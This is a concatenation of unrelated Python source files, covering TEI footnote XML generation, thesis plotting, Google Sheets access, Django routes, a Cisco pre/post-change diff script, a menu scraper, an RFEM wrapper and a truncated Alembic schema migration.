[{}] ' 'because missing space probably'.format(reference)) logger.error(error) raise AnalysisException # Add the witness and location XML to the result string result += '<locus target="' + witness.strip() + \ '">' + page.strip() + '</locus>' # If text has zero length we can stop if line == '': break else: # There is more text to process so start a new line result += '\n' return result def footnotes(string_to_process, next_footnote): """ This helper function takes a single string containing text and processes any embedded footnote symbols (describing additions, omissions, correxi, conieci and standard textual variations) to generate XML. It also deals with any XML generated using function _references(). 
The output is two lists of XML, one for the main text, the other for the apparatus. Parameters ---------- string_to_process: str This string contains the text to be processed. This should contain a single line from the text file being processed, e.g. a title, aphorism or commentary. This string may already contain XML generated using the _references() function i.e. XML identifying witnesses with each <locus> XML on a new line. next_footnote: int reference the footnote to find. Returns ------- 1. A Python list containing XML for the main text. 2. A Python list containing XML for the critical apparatus. 3. The number of the next footnote to be processed when this function complete. It is intended this function is called by main() on each line of text from the main document body. Raises ------ AnalysisException if footnote in commentary can not be defined. """ # Create lists to contain the XML xml_main = [] try: while True: # Use string partition to try to split this text at # the next footnote symbol footnote_symbol = '*' + str(next_footnote) + '*' text_before_symbol, sep, string_to_process = \ string_to_process.partition(footnote_symbol) # If the partition failed sep will have zero length and the next # footnote is not in this line, hence we can stop # processing and return if sep == '': # Add text_before_symbol to the XML and stop processing for next_line in text_before_symbol.splitlines(): xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip()) break # We know sep has non-zero length and we are dealing with # a footnote. # Now use string partition to try to split text_before_symbol # at a '#' character. 
next_text_for_xml, sep, base_text = \ text_before_symbol.partition('#') # If the above partition failed the footnote refers # to a single word if sep == '': # Use rpartition to partition at the LAST space in the # string before the footnote symbol next_text_for_xml, sep, base_text = \ text_before_symbol.rpartition(' ') # Check we succeeded in partitioning the text before the footnote # at '#' or ' '. If we didn't there's an error. if sep == '': error = ('Unable to partition text before footnote symbol ' '{}'.format(footnote_symbol)) logger.error(error) error = ('Probably missing a space or the "#" character ' 'to determine the word(s) to apply the footnote') logger.error(error) raise AnalysisException # Add the next_text_for_xml to xml_main for next_line in next_text_for_xml.splitlines(): xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip()) # Create an anchor for the app (as advised) xml_main.append(XML_OSS * XML_N_OFFSET + '<anchor xml:id="begin_fn' + str(next_footnote) + '"/>') # Create XML for this textural variation for xml_main # Add next_string to the xml_main and XML from a witness reference for next_line in base_text.splitlines(): xml_main.append(XML_OSS * (XML_N_OFFSET+2) + next_line) # End the anchor reference xml_main.append(XML_OSS * XML_N_OFFSET + '<anchor xml:id="end_fn' + str(next_footnote) + '"/>') # Increment the footnote number next_footnote += 1 # Test to see if there is any more text to process if string_to_process == '': break except (AttributeError, AnalysisException): error = 'Cannot analyse aphorism or commentary ' \ '{}'.format(string_to_process) logger.error(error) raise AnalysisException return xml_main, next_footnote
8,317
2,123
import locale
import numpy as np
import io
import json
import pandas as pd
import ast
import os

# Set to German locale to get comma decimal separater
locale.setlocale(locale.LC_NUMERIC, 'deu_deu')
#locale.setlocale(locale.LC_NUMERIC, 'de_DE.utf8')

import matplotlib as mpl
mpl.use('pgf')  # backend must be selected before pyplot is imported

# LaTeX preamble shared by the pgf backend and in-figure text rendering.
preamble = [
    # use utf8 fonts becasue your computer can handle it :)
    r"\usepackage[utf8x]{inputenc}",
    # plots will be generated using this preamble
    r"\usepackage[T1]{fontenc}",
    r"\usepackage[ngerman]{babel}",
    r"\usepackage{siunitx}",
    r"\usepackage{lmodern}",
    r"\usepackage{amsmath}",
    r"\usepackage{amsfonts}",
    r"\sisetup{detect-all}",
    r"\sisetup{locale = DE}"
]

pgf_with_latex = {  # setup matplotlib to use latex for output
    "pgf.texsystem": "pdflatex",  # change this if using xetex or lautex
    "text.usetex": True,  # use LaTeX to write all text
    "text.latex.unicode": True,
    "font.family": "sans-serif",
    # blank entries should cause plots to inherit fonts from the document
    "font.serif": [],
    "font.sans-serif": ['Helvetica'],
    "font.monospace": [],
    "axes.labelsize": 11,  # LaTeX default is 10pt font.
    "font.size": 11,
    "legend.fontsize": 10,  # Make the legend/label fonts a little smaller
    "xtick.labelsize": 10,
    "ytick.labelsize": 10,
    "figure.figsize": [0.9*5.67, 1.76],  # default fig size of 0.9 textwidth
    "errorbar.capsize": 0,  # set standard
    "markers.fillstyle": 'none',
    "lines.markersize": 1,
    "lines.linewidth": 1.5,
    "legend.fancybox": True,
    "mathtext.fontset": "cm",
    "text.latex.preamble": preamble,
    # "pgf.debug" : True,
    #"legend.loc": 1,
    "pgf.preamble": preamble,
    "legend.numpoints": 1,
    "legend.scatterpoints": 1,
    "axes.formatter.use_locale": True,
    "figure.subplot.bottom" : 0.19
}

mpl.rcParams.update(pgf_with_latex)

import matplotlib.pyplot as plt


class ThesisPlot(object):
    """Renders .pgf/.pdf thesis figures from JSON plot descriptions.

    Figures are registered via addPlot() and written out by generatePlots().
    NOTE(review): this is Python 2 code (print statements) and relies on
    long-removed APIs — pandas DataFrame.sort() and np.float — so it will
    not run unmodified on a modern stack.
    """

    # Per-curve style defaults, used when addPlot() passes None.
    colors=['b','r','g','k','y']
    linestyles=['-','-','-','-','-','-']
    linewidths=[1.5,1.5,1.5,1.5,1.5,1.5]
    markers=['o','o','o','o','o']
    elinewidth = 0.8  # error-bar line width

    def __init__(self):
        # figid -> plot-description dict; see addPlot() for the keys.
        self.dicts=dict()

    def generatePlots(self):
        """Render every registered figure and save <outfile> and <outfile>.pdf."""
        for d in self.dicts:
            self.f=plt.figure()
            # subplot_i counts DOWN while the subplot keys are iterated in
            # dict order — assumes per-subplot style lists are stored in
            # reverse subplot order; TODO confirm against the JSON files.
            for subplot_i, sp_ax in zip(range(len(self.dicts[d]['json'])-1,-1,-1), self.dicts[d]['json']):
                ax=self.f.add_subplot(sp_ax)
                # Optional manual y-label placement for this subplot.
                ylabeloffset=self.dicts[d]['ylabeloff'][subplot_i]
                print "ylavel off: "
                print ylabeloffset
                if ylabeloffset:
                    ax.yaxis.set_label_coords(ylabeloffset,0.5)
                num_curves = len(self.dicts[d]['json'][sp_ax])
                # Resolve styles: fall back to the class defaults; a 2-D
                # style list means one list per subplot.
                cs=self.dicts[d]['color']
                if cs==None:
                    cs=self.colors
                if len(np.shape(cs))==2:
                    cs=cs[subplot_i]
                ls=self.dicts[d]['linestyle']
                if ls==None:
                    ls=self.linestyles
                if len(np.shape(ls))==2:
                    ls=ls[subplot_i]
                lws=self.dicts[d]['linewidths']
                if lws==None:
                    lws=self.linewidths
                if len(np.shape(lws))==2:
                    lws=lws[subplot_i]
                tl=self.dicts[d]['tight']
                if tl:
                    self.f.tight_layout(w_pad=self.dicts[d]['wpad'],h_pad=self.dicts[d]['hpad'])
                # Explicit tick positions: a single nested list applies to
                # all subplots; a per-subplot list may hold None for auto.
                xticks = self.dicts[d]['xticks']
                print "shape"
                print np.shape(xticks)
                if np.shape(xticks)[0]==1:
                    ax.xaxis.set_ticks(xticks[0])
                elif len(np.shape(xticks))==1 and len(xticks) != 0:
                    if xticks[subplot_i] is not None:
                        ax.xaxis.set_ticks(xticks[subplot_i])
                yticks = self.dicts[d]['yticks']
                if len(np.shape(yticks))==0:
                    ax.yaxis.set_ticks(yticks)
                elif len(np.shape(yticks))==1 and len(yticks) != 0:
                    if yticks[subplot_i] is not None:
                        ax.yaxis.set_ticks(yticks[subplot_i])
                ms=self.dicts[d]['markers']
                if ms==None:
                    ms=self.markers
                if len(np.shape(ms))==2:
                    ms=ms[subplot_i]
                # Draw each curve of this subplot with its resolved style.
                for (c,l,lw,sp,m) in zip(cs[:num_curves],ls[:num_curves],lws[:num_curves],self.dicts[d]['json'][sp_ax],ms[:num_curves]):
                    if self.dicts[d]['json'][sp_ax][sp]['type']=='errorbar':
                        # 'y' is a JSON dict of x -> y; sort by numeric index.
                        # NOTE(review): DataFrame.sort() was removed from
                        # pandas — sort_index() is the modern equivalent.
                        df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
                        df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
                        df.sort(inplace=True)
                        x=np.array(df.index.values,dtype=np.float32)
                        y=np.array(df.values,dtype=np.float32)
                        # 'yerr' holds the error bars, same layout as 'y'.
                        dfErr = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['yerr']),orient='index')
                        dfErr.set_index(np.array(dfErr.index.values,dtype=np.float32),inplace=True)
                        dfErr.sort(inplace=True)
                        yerr=np.array(dfErr.values,dtype=np.float32)
                        # Optional per-curve keys; bare excepts fall back to
                        # defaults or leave the axis property untouched.
                        try:
                            label=self.dicts[d]['json'][sp_ax][sp]['label']
                        except:
                            label=None
                        try:
                            ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
                            ax.set_xlim(*xl)
                        except:
                            print "No x-limit found"
                        try:
                            yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
                            ax.set_ylim(*yl)
                        except:
                            print "No y-limit found"
                        ax.errorbar(x,y,yerr=yerr,label=label,color=c,ls=l,lw=lw,marker=m,markersize='5', elinewidth=self.elinewidth)
                    elif self.dicts[d]['json'][sp_ax][sp]['type']=='plot':
                        df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
                        df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
                        df.sort(inplace=True)
                        x=np.array(df.index.values,dtype=np.float32)
                        y=np.array(df.values,dtype=np.float32)
                        try:
                            # NOTE(review): rebinds the loop variable m (the
                            # marker); harmless here since the 'plot' branch
                            # does not use the marker afterwards.
                            m=self.dicts[d]['json'][sp_ax][sp]['margin']
                            ax.margins(*m)
                            print "found margin"
                        except:
                            print "No margin"
                        try:
                            label=self.dicts[d]['json'][sp_ax][sp]['label']
                        except:
                            label=None
                        try:
                            ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
                            ax.set_xlim(*xl)
                        except:
                            print "No x-limit found"
                        try:
                            yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
                            ax.set_ylim(*yl)
                        except:
                            print "No y-limit found"
                        ax.plot(x,y,label=label,color=c,ls=l,lw=lw)
                    elif self.dicts[d]['json'][sp_ax][sp]['type']=='scatter':
                        df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index')
                        df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True)
                        df.sort(inplace=True)
                        x=np.array(df.index.values,dtype=np.float32)
                        y=np.array(df.values,dtype=np.float32)
                        try:
                            m=self.dicts[d]['json'][sp_ax][sp]['margin']
                            ax.margins(*m)
                            print "found margin"
                        except:
                            print "No margin"
                        try:
                            label=self.dicts[d]['json'][sp_ax][sp]['label']
                        except:
                            label=None
                        try:
                            ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel'])
                        except:
                            print "No xlabel in %s ax %s"%(d, sp_ax)
                        try:
                            xl=self.dicts[d]['json'][sp_ax][sp]['xlim']
                            ax.set_xlim(*xl)
                        except:
                            print "No x-limit found"
                        try:
                            yl=self.dicts[d]['json'][sp_ax][sp]['ylim']
                            ax.set_ylim(*yl)
                        except:
                            print "No y-limit found"
                        ax.scatter(x,y,label=label,color=c,marker='o',s=16)
                    elif self.dicts[d]['json'][sp_ax][sp]['type']=='axh':
                        # Horizontal reference line at the given y value.
                        # NOTE(review): np.float was removed in NumPy 1.24.
                        try:
                            label=self.dicts[d]['json'][sp_ax][sp]['label']
                        except:
                            label=None
                        ax.axhline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
                    elif self.dicts[d]['json'][sp_ax][sp]['type']=='axv':
                        # Vertical reference line at the given x value.
                        try:
                            label=self.dicts[d]['json'][sp_ax][sp]['label']
                        except:
                            label=None
                        ax.axvline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw)
                #
                if self.dicts[d]['legend']:
                    ax.legend(loc=self.dicts[d]['loc'])
                # Optional subplot enumeration, e.g. "(a)". 'num' is read
                # from the LAST curve processed in the loop above.
                try:
                    num=self.dicts[d]['json'][sp_ax][sp]['num']
                except:
                    num=None
                if num is not None:
                    ax.text(0.1, 0.9, r'\textbf{(' + num + ')}', transform=ax.transAxes, weight='bold', ha='center', va='center')
                    xwin, ywin = ax.transAxes.transform((0.1, 0.9))
                    for l in ax.yaxis.get_major_ticks():
                        # check if a label overlaps with enumeration
                        bbox = l.label1.get_window_extent()
                        print bbox, xwin, ywin
                        if self._overlaps(np.array(bbox), xwin, ywin):
                            l.label1.set_visible(False)
            # (removed: commented-out automatic "(a)/(b)/..." enumeration of
            # all axes — superseded by the per-subplot 'num' handling above)
            s=self.figsize(self.dicts[d]['size'],1.0)
            self.f.subplots_adjust(bottom=self.dicts[d]['bottom'])
            self.f.set_size_inches(*s)
            print self.dicts[d]['outfile']
            self.f.savefig(self.dicts[d]['outfile'])
            self.f.savefig(self.dicts[d]['outfile']+".pdf")
            # self.f.clear()

    def _overlaps(self, bbox, x, y, dist=10):
        """Return True when window point (x, y) is within dist px of bbox."""
        xs, ys = bbox.T
        if (np.min(np.abs(xs - x)) > dist and np.prod(xs - x) > 0) or \
                (np.min(np.abs(ys - y)) > dist and np.prod(ys - y) > 0):
            return False
        else:
            # print np.min(np.abs(xs-x)), np.prod(xs-x), np.min(np.abs(ys-y)),
            # np.prod(ys-y)
            return True

    def parsePlotDict(self,filename):
        """Load a JSON plot-description file and return it as a dict."""
        with io.open(filename, 'r', encoding='utf-8') as f:
            plotDict=json.load(f)
        return plotDict

    def addPlot(self,name,outname,figid,size=2,ls=None,cs=None,lw=None,tl=False,w_pad=2.,h_pad=2.,legend=False,lloc=1,m=None, xticks=[], yticks=[], bottom=0.2,yoffset=None):
        """Register figure `figid` from JSON file `name`, output `outname`.

        Style arguments may be flat (shared by all subplots) or nested
        one-list-per-subplot; None selects the class defaults.
        NOTE(review): xticks/yticks are mutable default arguments shared
        across calls — safe only while callers never mutate them.
        NOTE(review): parsePlotDict() is called twice (file read twice).
        """
        nplots=len(self.parsePlotDict(name))
        if yoffset is None:
            yoffset=[None for _ in range(nplots)]
        self.dicts.update({figid:{'infile':name, 'outfile':outname, 'size':size, 'json':self.parsePlotDict(name), 'linestyle':ls, 'color':cs, 'linewidths':lw, 'markers':m, 'tight':tl, 'wpad':w_pad, 'hpad':h_pad, 'loc':lloc, 'legend':legend, 'xticks':xticks, 'yticks':yticks, 'bottom':bottom, 'ylabeloff':yoffset}})

    def figsize(self, rows, scale):
        """Return [width, height] in inches for a figure of `rows` rows."""
        # Get this from LaTeX using \the\textwidth
        fig_width_pt = 405.45183
        inches_per_pt = 1.0 / 72.27  # Convert pt to inch
        # Aesthetic ratio (you could change this) * 0.5
        golden_mean = rows * 0.51 * (np.sqrt(5.0) - 1.0) / 2.0
        fig_width = fig_width_pt * inches_per_pt * scale  # width in inches
        fig_height = fig_width * golden_mean  # height in inches
        fig_size = [fig_width, fig_height]
        return fig_size


if __name__=='__main__':
    TP=ThesisPlot()
    # (removed: a long history of commented-out addPlot() calls for other
    # thesis figures — recover them from version control if needed)
    TP.addPlot(os.path.join("Chap2","Transient","eit_propagation.json"),"2_3_eit_propagation.pgf","Chap2_Fig2.3",size=1,tl=True,yoffset=[-0.13,None],w_pad=1.6, bottom=0.22)
    TP.generatePlots()
21,201
7,383
import gspread

# If modifying these scopes, delete the file token.json.
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
CLIENT_SECRET_FILE = '.secrets/PythonSheetsApiSecret.json'
CREDENTIALS_TOKEN = '.secrets/token.json'

# The ID and range of a sample spreadsheet.
SPREADSHEET_ID = '1oc5TC_nGzLXk4sP3zhlyFeYt526cxXXVeDtvMDFWbno'
VALUE_RENDER_OPTION = 'FORMULA'
VALUE_INPUT_OPTION = 'RAW'

# Layout of the StyleStats worksheet: data starts on row 4.
stats_starting_row = 4
stylte_stats_sheet = 'StyleStats'
style_stats_range = 'B4:T'
style_final_str_column = 'StyleStats!M4:M'
style_final_end_column = 'StyleStats!N4:N'
style_final_dex_column = 'StyleStats!O4:O'
style_final_agi_column = 'StyleStats!P4:P'
style_final_int_column = 'StyleStats!Q4:Q'
style_final_wil_column = 'StyleStats!R4:R'
style_final_lov_column = 'StyleStats!S4:S'
style_final_cha_column = 'StyleStats!T4:T'


class Character:
    # Placeholder container for a character's sheet rows and display name.
    rows = []
    name = ''


def login():
    """Authorise against Google Sheets via the stored OAuth secrets."""
    return gspread.oauth(credentials_filename=CLIENT_SECRET_FILE,
                         authorized_user_filename=CREDENTIALS_TOKEN)


def get_styles(auth):
    """Map each character name (column B) to the worksheet row numbers it occupies."""
    style_sheet = auth.open_by_key(SPREADSHEET_ID)
    styles = style_sheet.worksheet(stylte_stats_sheet).get(
        style_stats_range, value_render_option=VALUE_RENDER_OPTION)
    characters = {}
    for offset, row in enumerate(styles):
        # Row numbers are 1-based and the table starts at stats_starting_row.
        characters.setdefault(row[0], []).append(offset + stats_starting_row)
    return characters


def update_sheet(auth, characters):
    """Write a probe value into cell A1 of the style-stats worksheet."""
    style_sheet = auth.open_by_key(SPREADSHEET_ID)
    style_data_sheet = style_sheet.worksheet(stylte_stats_sheet)
    style_data_sheet.update('A1', 'Testing')


if __name__ == '__main__':
    update_sheet(login(), '')
1,695
660
# Demonstrates round-tripping Python objects through JSON with the
# standard-library json module.
import json as j

# CONVERTING TO JSON: a dict serialises to a JSON object.
data = {
    "Name": "John Doe",
    "Age": "22",
}
y = j.dumps(data)
print(y)

# A list serialises to the equivalent JSON array.
data = [1, 2, 3, 4, 5]
i = j.dumps(data)
print(i)

# READING FROM JSON: parse a JSON document back into a dict.
x = '{ "name":"John", "age":30, "city":"New York"}'
y = j.loads(x)
print(y)
print(y["age"])
350
170
from django.urls import path

from programdom.problems.views import ProblemStudentView, ProblemListView, ProblemDetailView, ProblemDeleteView, \
    ProblemCreateView, ProblemTestcaseCreateView, ProblemTestCaseUpdateView, ProblemTestCaseDeleteView

# Routes for problem CRUD, the student-facing problem page, and nested
# test-case management (`tc_pk` addresses a test case within problem `pk`).
urlpatterns = [
    path("", ProblemListView.as_view(), name="problem_list"),
    path("new/", ProblemCreateView.as_view(), name="problem_create"),
    path("<int:pk>/", ProblemDetailView.as_view(), name="problem_detail"),
    path("<int:pk>/delete/", ProblemDeleteView.as_view(), name="problem_delete"),
    path("<int:pk>/student/", ProblemStudentView.as_view(), name="problem_student"),
    path("<int:pk>/tests/new/", ProblemTestcaseCreateView.as_view(), name="problem_test_new"),
    path("<int:pk>/tests/<int:tc_pk>/", ProblemTestCaseUpdateView.as_view(), name="problem_test_update"),
    path("<int:pk>/tests/<int:tc_pk>/delete/", ProblemTestCaseDeleteView.as_view(), name="problem_test_delete"),
]
958
287
from getpass import getpass
import netmiko
import re
import difflib


def make_connection(ip, username, password):
    """Open an SSH session to a Cisco IOS device and return the live handler."""
    return netmiko.ConnectHandler(device_type='cisco_ios', ip=ip,
                                  username=username, password=password)


def get_ip(input):
    """Return every dotted-quad IPv4 address found in *input* as a list of strings."""
    return re.findall(r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input)


def get_ips(file_name):
    """Append every IPv4 address found in *file_name* to the global ``ips`` list."""
    # `with` fixes the original's leaked file handle.
    with open(file_name, 'r') as f:
        for line in f:
            for ip in get_ip(line):
                ips.append(ip)


def to_doc_a(file_name, varable):
    """Append *varable* plus a newline to *file_name*."""
    with open(file_name, 'a') as f:
        f.write(varable)
        f.write('\n')


def to_doc_w(file_name, varable):
    """Overwrite *file_name* with *varable*."""
    with open(file_name, 'w') as f:
        f.write(varable)


# This will be a list of the devices we want to SSH to.
ips = []

# input/IPs.txt is a list of the IPs we want to connect to; pull them into `ips`.
get_ips("input/IPs.txt")

print('#' * 50)
print('#' * 50, '\n HOSTS', ips, '\n', " Make sure you have checked your individual command files", '\n')
print("IF INCORRECT QUIT NOW CTRL^C ", '\n', '#' * 50)
print('#' * 50)

# Prompt user for account info.
username = input("Username: ")
password = getpass()

# Required for the diff loop: pre-TVT output goes to Before, post-TVT to After.
file_name_input = input("For Pre-TVT type Before.txt - For Post-TVT type After.txt : ")

# For each IP, run the commands listed in input/<ip>.txt and record the output.
for ip in ips:
    file_name = "output/" + ip + "-" + file_name_input
    to_doc_w(file_name, "")

    # Per-host command list from input/<ip>.txt.
    commands_list = []
    with open("input/" + ip + '.txt', 'r') as f:
        for line in f:
            commands_list.append(line)

    try:
        net_connect = make_connection(ip, username, password)
        print("Completing " + ip)
        # Run all commands and append each result to the host's output file.
        for commands in commands_list:
            output = net_connect.send_command_timing(commands)
            results = output + '\n'
            to_doc_a(file_name, results)
    # BUG FIX: was a bare `except:` which also swallowed KeyboardInterrupt.
    except Exception:
        print(ip + " Failed to connect")

# Pre-TVT run: nothing to compare yet.
if "Before" in file_name:
    print('Completed')
# Post-TVT run: diff Before vs After for every host.
elif "After" in file_name:
    for ip in ips:
        fromfile = "output/" + ip + "-" + "Before.txt"
        tofile = "output/" + ip + "-" + "After.txt"
        # BUG FIX: the 'U' open mode was removed in Python 3.11; text mode
        # already performs universal-newline translation.
        with open(fromfile) as f:
            fromlines = f.readlines()
        with open(tofile) as f:
            tolines = f.readlines()
        diff = difflib.HtmlDiff().make_file(fromlines, tolines, fromfile, tofile)
        # BUG FIX: the original wrote the diff then called `f.close` without
        # parentheses, so the file was never explicitly closed.
        to_doc_w("output/" + ip + "-changes.html", diff)
        print("Open output/" + ip + "-changes.html to see difference")
else:
    print('Before or After not detected')
3,023
1,138
# Package name constant — presumably consumed by the packaging/setup scripts;
# TODO(review): confirm against the project's setup.py/build tooling.
name = "pyiArduinoI2Cmotor"
28
15
from __future__ import absolute_import, division, print_function, unicode_literals

from echomesh.util.registry.Module import register
from echomesh.output.OutputCache import OutputCache

# Registry of the output classes available in this package, keyed by the
# listed class names.
REGISTRY = register(
    __name__,
    'Bidirectional',
    'Offset',
    'Output',
    'Map',
    'Spi',
    'Test',
    'Visualizer',
)

# Shared cache so non-dict output specs resolve to reusable instances.
OUTPUT_CACHE = OutputCache()


def make_output(data):
    # A dict is treated as a full output description and built fresh via the
    # registry; anything else is looked up in (or added to) the cache.
    if isinstance(data, dict):
        return REGISTRY.make_from_description(data, default_type='output')
    else:
        return OUTPUT_CACHE.get_output(data)


def pause_outputs():
    # Thin forwarding wrapper; the local import avoids a circular import at
    # module load time. The inner name intentionally shadows this function.
    from echomesh.output.Output import pause_outputs
    pause_outputs()
620
212
from selenium import webdriver  # Browser control with options/waits/exceptions.
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import json


def main():
    """Scrape the weekly lunch menu from lintulahti.pihka.fi.

    Returns a dict mapping day heading -> list of food strings.
    """
    opts = Options()
    opts.add_argument('--headless')
    opts.add_argument('--disable-gpu')
    opts.add_argument('window-size=1000,1000')
    driver = webdriver.Chrome(options=opts)

    driver.get("http://lintulahti.pihka.fi/")
    html_source = driver.page_source.encode("utf-8")
    soup = BeautifulSoup(html_source, 'html.parser')

    menu = dict()
    # Each day of the menu lives in a div.menu-day block.
    day_elems = soup.findAll('div', {"class": ["menu-day"]})
    for elem in day_elems:
        day = elem.find('h3')
        # BUG FIX: `unicode` does not exist in Python 3 — use str().
        day = str(day.span.string).strip()

        foods = elem.findAll('li')
        foodarray = [str(food.span.string).strip() for food in foods]
        menu[day] = foodarray

    driver.close()
    return menu


def asString():
    """Render the scraped menu as one printable text blob."""
    menu = main()
    response = ""
    for key in menu:
        response += key + "\n"
        foods = menu[key]
        for food in foods:
            response += food + "\n"
        response += "\n"
    return response


if __name__ == '__main__':
    # BUG FIX: `print asString()` was Python 2 syntax (a SyntaxError on
    # Python 3, which the selenium usage above requires).
    print(asString())
1,221
454
# Read two values (assume they will never be equal) and print the larger one.
n1 = float(input('Numero 1:'))
n2 = float(input('Numero 2: '))
print(max(n1, n2))
203
89
from RFEM.initModel import ConvertToDlString, Model, clearAtributes

class MemberResultIntermediatePoint():
    def __init__(self,
                 no: int = 1,
                 members: str = "",
                 point_count: int = 2,
                 uniform_distribution: bool = True,
                 distances = None,
                 comment: str = '',
                 params: dict = None,
                 model = Model):
        """
        Create a Member Result Intermediate Point in the client model.

        Args:
            no (int): Member Result Intermediate Point Tag
            members (str): Assigned Members
            point_count (int): Assigned Point Number
            uniform_distribution (bool): Uniform Distrubition Option
            distances (list): Distances Table (list of [value] rows); only
                used when uniform_distribution is False
            comment (str, optional): Comment
            params (dict, optional): Parameters
            model: Target model (defaults to the global Model)
        """

        # Client model | Member Result Intermediate Point
        clientObject = model.clientModel.factory.create('ns0:member_result_intermediate_point')

        # Clears object atributes | Sets all atributes to None
        clearAtributes(clientObject)

        # Member Result Intermediate Point No.
        clientObject.no = no

        # Assigned Members
        clientObject.members = ConvertToDlString(members)

        # Point Count
        clientObject.uniform_distribution = uniform_distribution
        if uniform_distribution:
            clientObject.point_count = point_count
        else:
            # BUG FIX: the original used the `Model` class here instead of the
            # `model` parameter, so a caller-supplied model was ignored for
            # the distances table.
            clientObject.distances = model.clientModel.factory.create('ns0:member_result_intermediate_point.distances')

            for i, row in enumerate(distances):
                mlvlp = model.clientModel.factory.create('ns0:member_result_intermediate_point_distances')
                mlvlp.no = i + 1
                mlvlp.value = row[0]
                mlvlp.note = None

                clientObject.distances.member_result_intermediate_point_distances.append(mlvlp)

        # Comment
        clientObject.comment = comment

        # Adding optional parameters via dictionary
        if params:
            for key in params:
                clientObject[key] = params[key]

        # Add Member Result Intermediate Point to client model
        model.clientModel.service.set_member_result_intermediate_point(clientObject)
560
"""Initial schema

Revision ID: bdeeeacbec4d
Revises:
Create Date: 2020-04-11 11:20:18.814141

"""
import json

from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql

# revision identifiers, used by Alembic.
revision = 'bdeeeacbec4d'
down_revision = None
branch_labels = None
depends_on = None

# Per-account default for the JSONB notification_settings column.
DEFAULT_NOTIFICATIONS = {
    'innostore': 'off',
    'volunteering': 'off',
    'project_creation': 'off',
    'administration': 'off',
    'service': 'email',
}


def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Tables are created parents-first so foreign keys resolve.
    op.create_table('accounts',
        sa.Column('full_name', sa.String(length=256), nullable=False),
        sa.Column('group', sa.String(length=64), nullable=True),
        sa.Column('email', sa.String(length=128), nullable=False),
        sa.Column('telegram_username', sa.String(length=32), nullable=True),
        sa.Column('is_admin', sa.Boolean(), nullable=False),
        sa.Column('notification_settings', postgresql.JSONB(astext_type=sa.Text()), nullable=False,
                  server_default=json.dumps(DEFAULT_NOTIFICATIONS)),
        sa.PrimaryKeyConstraint('email')
    )
    # Look-up tables for product variants (colors / sizes below).
    op.create_table('colors',
        sa.Column('value', sa.String(length=6), nullable=False),
        sa.PrimaryKeyConstraint('value')
    )
    op.create_table('competences',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(length=128), nullable=False),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('name')
    )
    op.create_table('products',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(length=128), nullable=False),
        sa.Column('type', sa.String(length=128), nullable=True),
        sa.Column('description', sa.String(length=1024), nullable=False),
        sa.Column('price', sa.Integer(), nullable=False),
        sa.Column('addition_time', sa.DateTime(timezone=True), nullable=False),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('name', 'type', name='unique product')
    )
    op.create_table('sizes',
        sa.Column('value', sa.String(length=3), nullable=False),
        sa.PrimaryKeyConstraint('value')
    )
    op.create_table('notifications',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('recipient_email', sa.String(length=128), nullable=False),
        sa.Column('is_read', sa.Boolean(), nullable=False),
        sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True),
        sa.Column('timestamp', sa.DateTime(timezone=True), nullable=False),
        sa.Column('type', sa.Enum('purchase_status_changed', 'new_arrivals', 'claim_innopoints',
                                  'application_status_changed', 'service', 'manual_transaction',
                                  'project_review_status_changed', 'all_feedback_in', 'added_as_moderator',
                                  'out_of_stock', 'new_purchase', 'project_review_requested',
                                  name='notificationtype'), nullable=False),
        sa.ForeignKeyConstraint(['recipient_email'], ['accounts.email'], ),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('static_files',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('mimetype', sa.String(length=255), nullable=False),
        sa.Column('owner_email', sa.String(length=128), nullable=False),
        sa.ForeignKeyConstraint(['owner_email'], ['accounts.email'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('varieties',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('product_id', sa.Integer(), nullable=False),
        sa.Column('size', sa.String(length=3), nullable=True),
        sa.Column('color', sa.String(length=6), nullable=True),
